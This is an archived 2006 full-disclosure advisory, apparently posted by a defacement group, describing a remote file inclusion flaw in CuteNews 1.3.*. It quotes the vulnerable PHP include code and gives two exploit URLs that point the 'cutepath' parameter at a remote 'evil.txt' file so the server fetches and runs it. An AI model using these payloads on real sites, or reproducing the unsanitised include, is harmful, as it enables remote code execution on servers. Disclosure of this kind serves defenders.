Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA21648] Fotopholder "path" Cross-Site Scripting Vulnerability

  [Full-disclosure] [vuln.sg] Cybozu Garoon 2 SQL Injection Vulnerabilities

  [Full-disclosure] [vuln.sg] Cybozu Products Arbitrary File Retrieval Vulnerability

  eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

From:stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date:28.08.2006
Subject:CuteNews 1.3.* Remote File Include Vulnerability

Welcome people In World Defacers Team

[W]orld [D]efacers Team

======================================

--------------------Summary----------------

eVuln ID: WD22

Vendor:  CuteNews 1.3.*

Vendor's Web Site: http://cutephp.com/

Software: Live Customer Support Solution :- http://www.pansionat.net/novost/

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS (worlddefacers.de)

-----------------Description---------------

$cutepath =  __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);

require_once("$cutepath/inc/functions.inc.php");

--------------PoC/Exploit----------------------

show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru